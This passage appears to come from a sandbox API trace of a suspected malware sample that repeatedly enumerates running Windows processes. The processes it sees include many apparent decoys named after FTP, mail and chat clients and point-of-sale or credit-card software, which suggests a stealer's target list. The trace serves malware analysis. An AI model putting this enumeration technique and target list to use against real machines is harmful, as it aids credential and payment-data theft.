szExeFile="SkypeHost.exe")) returned 1 [0241.641] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0241.642] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0241.644] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0241.646] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.648] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.649] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0241.651] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.653] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.655] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.657] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.659] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.661] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0241.662] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0241.664] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0241.666] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0241.668] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0241.669] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0241.713] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0241.715] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0241.717] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0241.719] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0241.721] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0241.723] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0241.725] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0241.727] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0241.730] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0241.732] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0241.736] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0241.739] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0241.741] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0241.743] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0241.746] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0241.748] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0241.755] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0241.757] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0241.760] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0241.762] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0241.764] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0241.766] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0241.768] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0241.772] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0241.774] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0241.778] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0241.781] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0241.784] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0241.786] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0241.789] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0241.795] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0241.800] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0241.804] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0241.807] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0241.809] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0241.812] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0241.814] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0241.816] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0241.817] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0241.819] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0241.822] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0241.824] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0241.826] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0241.830] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0241.835] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0241.837] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0241.838] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0241.840] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0241.843] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0241.844] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0241.846] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0241.849] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0241.851] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0241.852] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0241.854] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0241.856] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.858] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0241.860] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.861] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.866] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0241.880] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.884] Process32Next (in: hSnapshot=0x2284, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0241.886] CloseHandle (hObject=0x2284) returned 1 [0241.886] Sleep (dwMilliseconds=0x64) [0242.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22e4 [0242.050] Process32First (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.053] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.056] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.058] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.060] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.063] Process32Next (in: hSnapshot=0x22e4, lppe=0x102efe20 